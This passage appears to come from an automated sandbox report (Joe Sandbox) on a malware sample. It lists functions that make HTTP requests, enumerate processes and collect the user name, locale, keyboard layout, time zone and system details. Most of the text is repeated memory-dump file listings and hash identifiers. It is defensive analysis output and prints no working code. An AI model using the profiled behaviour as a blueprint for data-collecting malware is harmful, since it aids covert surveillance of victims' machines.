                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                                                                                          • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                                                                          • API String ID: 3863758870-2509457195
                                                                                                                                                                                                                                                          • Opcode ID: 0135211b612a63f186019c726389f99091979eb0aa7fe3f859ab1231a67949ac
                                                                                                                                                                                                                                                          • Instruction ID: 117be23bca9defa0c9a2d104379233709f0bf3c0e42bff48bb91311e8bbb53e6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0135211b612a63f186019c726389f99091979eb0aa7fe3f859ab1231a67949ac
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7519D729001ADAFDF20AF61DC85AEEB7B9FB04340F0081E6F648E6151DE755E85AF80
                                                                                                                                                                                                                                                          Function 00FF0FFE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          • GetKeyboardLayoutList.USER32(00000000,00000000,010157B7,?,?), ref: 00FF102F
                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FF103D
                                                                                                                                                                                                                                                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00FF104B
                                                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00FF107A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 00FF1122
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                          • String ID: /
                                                                                                                                                                                                                                                          • API String ID: 507856799-4001269591
                                                                                                                                                                                                                                                          • Opcode ID: 5ffe0c537f657af20cadad82735a2b4fd2945de330a9864285636e8311a83b92
                                                                                                                                                                                                                                                          • Instruction ID: d5f5203750719219fb684b565180b0f24b13e9db0dba608c8583f77dab63605c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ffe0c537f657af20cadad82735a2b4fd2945de330a9864285636e8311a83b92
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08310B75D0022C9FDB20AB65DC8DAADB3B8BF04300F5141E5F619A7162CB786E85DF90
                                                                                                                                                                                                                                                          Function 00FF197A Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00FF1981
                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(010121C8,00000000,00000001,0101A004,?,00000018,00FF1B24,?), ref: 00FF19A4
                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00FF19B1
                                                                                                                                                                                                                                                          • _wtoi64.MSVCRT ref: 00FF19E4
                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00FF19FD
                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00FF1A04
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 181426013-0
                                                                                                                                                                                                                                                          • Opcode ID: ff7f897dec02997b174796e91f0dad5b92ffe5287fee05025542f4360c955c07
                                                                                                                                                                                                                                                          • Instruction ID: b6fda22dfa5d2c34e8f4c3b168ffb582fcd2c4ca6c79859fba623fdc32c4667e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff7f897dec02997b174796e91f0dad5b92ffe5287fee05025542f4360c955c07
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB115E71D0424BDFCB21DFA4C8889EEBBB5BF49310F144469F645E7290CB794941DB60
                                                                                                                                                                                                                                                          Function 00FF16C8 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,010157BE,?,?), ref: 00FF16F7
                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00FF1707
                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 00FF1765
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00FF1770
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 907984538-0
                                                                                                                                                                                                                                                          • Opcode ID: fad868a1f0fff819f5228872e8beea28041735e1a1faefaf327759d42132d30f
                                                                                                                                                                                                                                                          • Instruction ID: 8f43ad4c8886b6bc51b0b4a1045550479bba003a7d84df3e3738952d67b02bda
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fad868a1f0fff819f5228872e8beea28041735e1a1faefaf327759d42132d30f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30113076A0021C9BD721BB65EC85AFD73A9BF44310F404095FB09B7256DF78AE44AF90
                                                                                                                                                                                                                                                          Function 00FF0F51 Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00FF0F6C
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FF0F73
                                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 00FF0F82
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF0FA0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 362916592-0
                                                                                                                                                                                                                                                          • Opcode ID: 3e5c77eec5e209b18a80dc32c9e65d31b2c7b78482e0d1dad4e5410e5d6185cf
                                                                                                                                                                                                                                                          • Instruction ID: d8c2c93ad33962a7f43d015b30d0fd7be9d56a3610f3b2b0bad6855abd99ca0e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e5c77eec5e209b18a80dc32c9e65d31b2c7b78482e0d1dad4e5410e5d6185cf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F0B471A00318AFD720DBB4BC0DB6E37A9AF45325F540259F615D61C4DB74AE048B85
                                                                                                                                                                                                                                                          Function 00FF0E76 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE13A9), ref: 00FF0E82
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00FE13A9), ref: 00FF0E89
                                                                                                                                                                                                                                                          • GetUserNameA.ADVAPI32(00000000,00FE13A9), ref: 00FF0E9D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1206570057-0
                                                                                                                                                                                                                                                          • Opcode ID: a1430d2b62ca592493e192d88ec09e009f416056d4e3985f17bde723f6443813
                                                                                                                                                                                                                                                          • Instruction ID: 15e1cb920856834c795e18eaa45651311fc648a7eacf1620d1fafad7a444308a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1430d2b62ca592493e192d88ec09e009f416056d4e3985f17bde723f6443813
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57D017B6200205BBD7219B95D80DE8A7AECEB84B25F004055BA86D2284DAF999489B20
                                                                                                                                                                                                                                                          Function 00FF11DD Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2452939696-0
                                                                                                                                                                                                                                                          • Opcode ID: e637e8aab801439de9bc44e71c31382fac72ef2389c198cbea4390031139136a
                                                                                                                                                                                                                                                          • Instruction ID: 6c0481986785c7e2717436e8e2b08dc759ad54590fa62cf2574ac2b65fcfdefc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e637e8aab801439de9bc44e71c31382fac72ef2389c198cbea4390031139136a
